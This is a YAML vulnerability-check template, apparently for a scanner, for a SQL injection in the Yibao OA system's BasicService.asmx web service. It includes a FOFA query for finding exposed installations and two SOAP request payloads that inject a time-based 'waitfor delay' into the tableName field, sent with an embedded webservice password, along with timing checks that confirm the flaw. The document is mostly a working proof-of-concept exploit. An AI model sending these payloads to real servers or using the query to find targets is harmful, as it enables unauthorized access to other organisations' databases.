product: 顶讯科技-易宝OA系统
vName: 易宝OA BasicService.asmx存在SQL注入
type: SQL注入
vID: [ ]
level: 3
vDesc: 易宝OA BasicService.asmx存在SQL注入
version: ''
note: ''
search:
  FOFA: app="顶讯科技-易宝OA系统"
protocol: http
link: ''
fix:
  - 建议联系软件厂商进行处理。
model: ''
logic: and
exploit:
  - exp:
      method: post
      follow: false
      path: /WebService/BasicService.asmx
      data: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><GetStreamID xmlns="http://tempuri.org/"><tableName>';waitfor delay '0:0:5'--+</tableName><webservicePassword>{ac80457b-368d-4062-b2dd-ae4d490e1c4b}</webservicePassword></GetStreamID></soap:Body></soap:Envelope>
    verify:
      path: ''
      logic: and
      check:
        - time:
            check: ">="
            num: 5
  - exp:
      method: post
      follow: false
      path: /WebService/BasicService.asmx
      data: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><GetStreamID xmlns="http://tempuri.org/"><tableName>';waitfor delay '0:0:0'--+</tableName><webservicePassword>{ac80457b-368d-4062-b2dd-ae4d490e1c4b}</webservicePassword></GetStreamID></soap:Body></soap:Envelope>
    verify:
      path: ''
      logic: and
      check:
        - time:
            check: "<="
            num: 3